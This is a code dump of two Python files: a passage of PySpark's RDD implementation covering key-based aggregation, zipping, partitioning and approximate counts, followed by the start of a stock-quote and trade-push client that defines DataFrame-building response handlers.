- `mergeCombiners`, to combine two C's into a single one (e.g., merges
the lists)
To avoid memory allocation, both mergeValue and mergeCombiners are allowed to
modify and return their first argument instead of creating a new C.
In addition, users can control the partitioning of the output RDD.
.. note:: V and C can be different -- for example, one might group an RDD of type
(Int, Int) into an RDD of type (Int, List[Int]).
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 2)])
>>> def to_list(a):
... return [a]
...
>>> def append(a, b):
... a.append(b)
... return a
...
>>> def extend(a, b):
... a.extend(b)
... return a
...
>>> sorted(x.combineByKey(to_list, append, extend).collect())
[('a', [1, 2]), ('b', [1])]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's, The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
.. note:: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom parittioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in `self` or `other`, return a resulting RDD that
contains a tuple with the list of values for that key in `self` as
well as `other`.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in `self` that has no pair with matching
key in `other`.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in `self` that is not contained in `other`.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying `f`.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
return self.coalesce(numPartitions, shuffle=True)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
if shuffle:
# Decrease the batch size in order to distribute evenly the elements across output
# partitions. Otherwise, repartition will possibly produce highly skewed partitions.
batchSize = min(10, self.ctx._batchSize or 1024)
ser = BatchedSerializer(PickleSerializer(), batchSize)
selfCopy = self._reserialize(ser)
jrdd_deserializer = selfCopy._jrdd_deserializer
jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle)
else:
jrdd_deserializer = self._jrdd_deserializer
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partitions.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
:meth:`zipWithIndex`.
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return a JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
`"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available here
<https://doi.org/10.1145/2452376.2452456>`_.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
with SCCallSiteSync(self.context) as css:
sock_info = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd())
return _local_iterator_from_socket(sock_info, self._jrdd_deserializer)
def barrier(self):
"""
.. note:: Experimental
Marks the current stage as a barrier stage, where Spark must launch all tasks together.
In case of a task failure, instead of only restarting the failed task, Spark will abort the
entire stage and relaunch all tasks for this stage.
The barrier execution mode feature is experimental and it only handles limited scenarios.
Please read the linked SPIP and design docs to understand the limitations and future plans.
:return: an :class:`RDDBarrier` instance that provides actions within a barrier stage.
.. seealso:: :class:`BarrierTaskContext`
.. seealso:: `SPIP: Barrier Execution Mode
<http://jira.apache.org/jira/browse/SPARK-24374>`_
.. seealso:: `Design Doc <https://jira.apache.org/jira/browse/SPARK-24582>`_
.. versionadded:: 2.4.0
"""
return RDDBarrier(self)
def _is_barrier(self):
"""
Whether this RDD is in a barrier stage.
"""
return self._jrdd.rdd().isBarrier()
def _prepare_for_python_RDD(sc, command):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > sc._jvm.PythonUtils.getBroadcastThreshold(sc._jsc): # Default 1M
# The broadcast will have same life cycle as created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars]
sc._pickled_broadcast_vars.clear()
return pickled_command, broadcast_vars, sc.environment, sc._python_includes
def _wrap_function(sc, func, deserializer, serializer, profiler=None):
assert deserializer, "deserializer should not be empty"
assert serializer, "serializer should not be empty"
command = (func, profiler, deserializer, serializer)
pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec,
sc.pythonVer, broadcast_vars, sc._javaAccumulator)
class RDDBarrier(object):
"""
.. note:: Experimental
Wraps an RDD in a barrier stage, which forces Spark to launch tasks of this stage together.
:class:`RDDBarrier` instances are created by :func:`RDD.barrier`.
.. versionadded:: 2.4.0
"""
def __init__(self, rdd):
self.rdd = rdd
def mapPartitions(self, f, preservesPartitioning=False):
"""
.. note:: Experimental
Returns a new RDD by applying a function to each partition of the wrapped RDD,
where tasks are launched together in a barrier stage.
The interface is the same as :func:`RDD.mapPartitions`.
Please see the API doc there.
.. versionadded:: 2.4.0
"""
def func(s, iterator):
return f(iterator)
return PipelinedRDD(self.rdd, func, preservesPartitioning, isFromBarrier=True)
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False, isFromBarrier=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
self.is_barrier = isFromBarrier or prev._is_barrier()
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer, profiler)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func,
self.preservesPartitioning, self.is_barrier)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _is_barrier(self):
return self.is_barrier
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
open_context.py
|
# -*- coding: utf-8 -*-
"""
Market quote and trade context setting
"""
from .quote_query import *
from .trade_query import *
from .utils import is_str
from multiprocessing import Queue
from threading import RLock, Thread
import select
import sys
import pandas as pd
import asyncore
import socket as sock
import time
from time import sleep
from abc import ABCMeta, abstractmethod
from struct import pack
import traceback
class RspHandlerBase(object):
"""callback function base class"""
def __init__(self):
pass
def on_recv_rsp(self, rsp_content):
"""receive response callback function"""
return 0, None
def on_error(self, error_str):
"""error callback function"""
pass
class StockQuoteHandlerBase(RspHandlerBase):
"""Base class for handle stock quote"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, quote_list = StockQuoteQuery.unpack_rsp(rsp_str)
if ret_code == RET_ERROR:
return ret_code, msg
else:
col_list = ['code', 'data_date', 'data_time', 'last_price', 'open_price',
'high_price', 'low_price', 'prev_close_price',
'volume', 'turnover', 'turnover_rate', 'amplitude', 'suspension', 'listing_date', 'price_spread'
]
quote_frame_table = pd.DataFrame(quote_list, columns=col_list)
return RET_OK, quote_frame_table
def on_error(self, error_str):
"""error callback function"""
return error_str
class OrderBookHandlerBase(RspHandlerBase):
"""Base class for handling order book data"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, order_book = OrderBookQuery.unpack_rsp(rsp_str)
if ret_code == RET_ERROR:
return ret_code, msg
else:
return ret_code, order_book
def on_error(self, error_str):
"""error callback function"""
return error_str
class CurKlineHandlerBase(RspHandlerBase):
"""Base class for handling current Kline data"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, kline_list = CurKlineQuery.unpack_rsp(rsp_str)
if ret_code == RET_ERROR:
return ret_code, msg
else:
col_list = ['code', 'time_key', 'open', 'close', 'high', 'low', 'volume', 'turnover', 'k_type']
kline_frame_table = pd.DataFrame(kline_list, columns=col_list)
return RET_OK, kline_frame_table
def on_error(self, error_str):
"""error callback function"""
return error_str
class TickerHandlerBase(RspHandlerBase):
"""Base class for handling ticker data"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, ticker_list = TickerQuery.unpack_rsp(rsp_str)
if ret_code == RET_ERROR:
return ret_code, msg
else:
col_list = ['code', 'time', 'price', 'volume', 'turnover', "ticker_direction", 'sequence']
ticker_frame_table = pd.DataFrame(ticker_list, columns=col_list)
return RET_OK, ticker_frame_table
def on_error(self, error_str):
"""error callback function"""
return error_str
class RTDataHandlerBase(RspHandlerBase):
"""Base class for handling real-time data"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, rt_data_list = RtDataQuery.unpack_rsp(rsp_str)
if ret_code == RET_ERROR:
return ret_code, msg
else:
col_list = ['code', 'time', 'data_status', 'opened_mins', 'cur_price', "last_close", 'avg_price',
'turnover', 'volume']
rt_data_table = pd.DataFrame(rt_data_list, columns=col_list)
return RET_OK, rt_data_table
def on_error(self, error_str):
"""error callback function"""
return error_str
class BrokerHandlerBase(RspHandlerBase):
"""Base class for handling broker"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, bid_content, ask_content = BrokerQueueQuery.unpack_rsp(rsp_str)
if ret_code == RET_ERROR:
return ret_code, [bid_content, ask_content]
else:
bid_list = ['code', 'bid_broker_id', 'bid_broker_name', 'bid_broker_pos']
ask_list = ['code', 'ask_broker_id', 'ask_broker_name', 'ask_broker_pos']
bid_frame_table = pd.DataFrame(bid_content, columns=bid_list)
ask_frame_table = pd.DataFrame(ask_content, columns=ask_list)
return RET_OK, [bid_frame_table, ask_frame_table]
def on_error(self, error_str):
"""error callback function"""
return error_str
class HeartBeatHandlerBase(RspHandlerBase):
"""Base class for handling Heart Beat"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, timestamp = HeartBeatPush.unpack_rsp(rsp_str)
return ret_code, timestamp
def on_error(self, error_str):
"""error callback function"""
return error_str
class HKTradeOrderHandlerBase(RspHandlerBase):
"""Base class for handle trader order push"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, order_info = TradePushQuery.hk_unpack_order_push_rsp(rsp_str)
order_list = [order_info]
if ret_code == RET_ERROR:
return ret_code, msg
else:
col_list = ['envtype', 'code', 'stock_name', 'dealt_avg_price', 'dealt_qty',
'qty', 'orderid', 'order_type',
'order_side', 'price', 'status', 'submited_time', 'updated_time'
]
trade_frame_table = pd.DataFrame(order_list, columns=col_list)
return RET_OK, trade_frame_table
def on_error(self, error_str):
"""error callback function"""
return error_str
class HKTradeOrderPreHandler(RspHandlerBase):
"""class for pre handle trader order push"""
def __init__(self, notify_obj=None):
self._notify_obj = notify_obj
super(HKTradeOrderPreHandler, self).__init__()
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, order_info = TradePushQuery.hk_unpack_order_push_rsp(rsp_str)
if ret_code == RET_OK:
orderid = order_info['orderid']
envtype = order_info['envtype']
status = order_info['status']
if self._notify_obj is not None:
self._notify_obj.on_trade_order_check(orderid, envtype, status)
return ret_code, None
class USTradeOrderHandlerBase(RspHandlerBase):
"""Base class for handle trader order push"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, order_info = TradePushQuery.us_unpack_order_push_rsp(rsp_str)
order_list = [order_info]
if ret_code == RET_ERROR:
return ret_code, msg
else:
col_list = ['envtype', 'code', 'stock_name', 'dealt_avg_price', 'dealt_qty',
'qty', 'orderid', 'order_type',
'order_side', 'price', 'status', 'submited_time', 'updated_time'
]
trade_frame_table = pd.DataFrame(order_list, columns=col_list)
return RET_OK, trade_frame_table
def on_error(self, error_str):
"""error callback function"""
return error_str
class USTradeOrderPreHandler(RspHandlerBase):
"""class for pre handle trader order push"""
def __init__(self, notify_obj=None):
self._notify_obj = notify_obj
super(USTradeOrderPreHandler, self).__init__()
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, order_info = TradePushQuery.us_unpack_order_push_rsp(rsp_str)
if ret_code == RET_OK:
orderid = order_info['orderid']
envtype = order_info['envtype']
status = order_info['status']
if self._notify_obj is not None and is_USTrade_order_status_finish(status):
self._notify_obj.on_trade_order_check(orderid, envtype, status)
return ret_code, None
class HKTradeDealHandlerBase(RspHandlerBase):
"""Base class for handle trade deal push"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, deal_info = TradePushQuery.hk_unpack_deal_push_rsp(rsp_str)
deal_list = [deal_info]
if ret_code == RET_ERROR:
return ret_code, msg
else:
col_list = ['envtype', 'code', 'stock_name', 'dealid',
'orderid', 'qty', 'price', 'order_side',
'time', 'contra_broker_id', 'contra_broker_name'
]
trade_frame_table = pd.DataFrame(deal_list, columns=col_list)
return RET_OK, trade_frame_table
def on_error(self, error_str):
"""error callback function"""
return error_str
class USTradeDealHandlerBase(RspHandlerBase):
"""Base class for handle trade deal push"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, deal_info = TradePushQuery.us_unpack_deal_push_rsp(rsp_str)
deal_list = [deal_info]
if ret_code == RET_ERROR:
return ret_code, msg
else:
col_list = ['envtype', 'code', 'stock_name', 'dealid',
'orderid', 'qty', 'price', 'order_side', 'time',
]
trade_frame_table = pd.DataFrame(deal_list, columns=col_list)
return RET_OK, trade_frame_table
def on_error(self, error_str):
"""error callback function"""
return error_str
class HandlerContext:
"""Handle Context"""
def __init__(self, cb_check_recv):
self.cb_check_recv = cb_check_recv
self._default_handler = RspHandlerBase()
self._handler_table = {"1030": {"type": StockQuoteHandlerBase, "obj": StockQuoteHandlerBase()},
"1031": {"type": OrderBookHandlerBase, "obj": OrderBookHandlerBase()},
"1032": {"type": CurKlineHandlerBase, "obj": CurKlineHandlerBase()},
"1033": {"type": TickerHandlerBase, "obj": TickerHandlerBase()},
"1034": {"type": RTDataHandlerBase, "obj": RTDataHandlerBase()},
"1035": {"type": BrokerHandlerBase, "obj": BrokerHandlerBase()},
"1036": {"type": HeartBeatHandlerBase, "obj": HeartBeatHandlerBase()},
"6200": {"type": HKTradeOrderHandlerBase, "obj": HKTradeOrderHandlerBase()},
"6201": {"type": HKTradeDealHandlerBase, "obj": HKTradeDealHandlerBase()},
"7200": {"type": USTradeOrderHandlerBase, "obj": USTradeOrderHandlerBase()},
"7201": {"type": USTradeDealHandlerBase, "obj": USTradeDealHandlerBase()},
}
